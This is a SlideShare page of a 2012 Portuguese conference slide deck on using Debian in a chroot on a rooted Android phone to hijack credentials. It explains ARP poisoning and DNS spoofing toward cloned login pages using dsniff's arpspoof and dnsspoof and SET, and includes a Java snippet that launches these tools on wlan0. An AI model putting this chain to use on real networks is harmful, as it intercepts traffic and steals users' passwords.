+                      =Debian com Android Para Sequesto de            Credenciais              WILBERTO FILHO            ...
Quem sou eu?
Quem eu não sou
Quem eu não sou
Quem eu sou
Quem eu sou
Credential Hijack
Credential HijackCredential Hijack   Roubar senha
Objetivos
Objetivos (NÃO)         VOU ROUBAR A SENHA         DA MINHA NAMORADA!
Objetivos
Objetivos
Objetivos
O que precisava?  DNS SPOOFING
O que precisava?        Enfia o cabo que eu gosto!
Por que ARP Poisoning?
Porque ARP Poisoning?10.0.0.1   ARP   00:00:5E:00:01:03
Porque ARP Poisoning?                      10.0.0.5                                  Internet10.0.0.3                     ...
Porque ARP Poisoning?                              10.0.0.5                                          Internet10.0.0.3     ...
Porque ARP Poisoning?                              10.0.0.5                                          EU!                  ...
Por que ARP Poisoning?
Porque DNS Spoofing? Quero www.facebook.com!                                       OK!         DNS Request                ...
Porque placa em promiscous?     Quero www.google.com!                                   OK!           DNS Request         ...
Primeira Tentativa
Primeira Tentativa     RESULTADO
Segunda tentativa
Por que Debian?    apt-get moo
Por que Debian?1- debootstrap2- dd3- mke2fs4- mount5- chroot
Ferramentas   Busybox
FerramentasDSNIFF - ARPSPOOF
FerramentasDSNIFF - DNSSPOOF
Ferramentas
Ferramentas   SET
Usando o ataque
Usando o ataquepublic void prepararAmbiente() throws IOException, InterruptedException {     Process p=Runtime.getRuntime(...
Resultado
Resultado
Obrigado!        João Paulo       Tiago Ferreira      Paula CavalcantiE a todos vocês pela atenção!
Upcoming SlideShare
Loading in …5
×

Debian com Android para Sequestro de Credencias

488 views

Published on

Apresentação para AndroidRec 2012. Única referência bibliográfica: TCP/IP Illustrated. Vol I The protocols.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
488
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
5
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Debian com Android para Sequestro de Credencias

  1. 1. + =Debian com Android Para Sequesto de Credenciais WILBERTO FILHO Partec - Tangerina Lab wilbertofilho@tangerinalab.com
  2. 2. Quem sou eu?
  3. 3. Quem eu não sou
  4. 4. Quem eu não sou
  5. 5. Quem eu sou
  6. 6. Quem eu sou
  7. 7. Credential Hijack
  8. 8. Credential HijackCredential Hijack Roubar senha
  9. 9. Objetivos
  10. 10. Objetivos (NÃO) VOU ROUBAR A SENHA DA MINHA NAMORADA!
  11. 11. Objetivos
  12. 12. Objetivos
  13. 13. Objetivos
  14. 14. O que precisava? DNS SPOOFING
  15. 15. O que precisava? Enfia o cabo que eu gosto!
  16. 16. Por que ARP Poisoning?
  17. 17. Porque ARP Poisoning?10.0.0.1 ARP 00:00:5E:00:01:03
  18. 18. Porque ARP Poisoning? 10.0.0.5 Internet10.0.0.3 10.0.0.1 192.168.1.110.0.0.2 10.0.0.4
  19. 19. Porque ARP Poisoning? 10.0.0.5 Internet10.0.0.3 10.0.0.1 Quem é 10.0.0.1? 192.168.1.110.0.0.2 10.0.0.4
  20. 20. Porque ARP Poisoning? 10.0.0.5 EU! Internet10.0.0.3 10.0.0.1 Quem é 10.0.0.1? 192.168.1.110.0.0.2 10.0.0.4
  21. 21. Por que ARP Poisoning?
  22. 22. Porque DNS Spoofing? Quero www.facebook.com! OK! DNS Request - Servidor DNS - Servidor HTTP - Página Clonada
  23. 23. Porque placa em promiscous? Quero www.google.com! OK! DNS Request Internet ...
  24. 24. Primeira Tentativa
  25. 25. Primeira Tentativa RESULTADO
  26. 26. Segunda tentativa
  27. 27. Por que Debian? apt-get moo
  28. 28. Por que Debian?1- debootstrap2- dd3- mke2fs4- mount5- chroot
  29. 29. Ferramentas Busybox
  30. 30. FerramentasDSNIFF - ARPSPOOF
  31. 31. FerramentasDSNIFF - DNSSPOOF
  32. 32. Ferramentas
  33. 33. Ferramentas SET
  34. 34. Usando o ataque
  35. 35. Usando o ataquepublic void prepararAmbiente() throws IOException, InterruptedException { Process p=Runtime.getRuntime().exec("su"); DataOutputStream stream=new DataOutputStream(p.getOutputStream()); stream.writeBytes("mount -o loop -t ext4 /sdcard/debian.img /data/local/debian"); stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c /usr/bin/nohup /usr/sbin/arpspoof -i wlan0 192.168.1.1&"); stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c/usr/bin/nohup /usr/sbin/dnsspoof -i wlan0 -f /home/wilberto/spoof.txt&"); stream.writeBytes("busybox chroot /data/local/debian /bin/bash -c/home/wilberto/set/set-automate droidhawk.txt"); stream.close(); p.destroy(); }
  36. 36. Resultado
  37. 37. Resultado
  38. 38. Obrigado! João Paulo Tiago Ferreira Paula CavalcantiE a todos vocês pela atenção!

×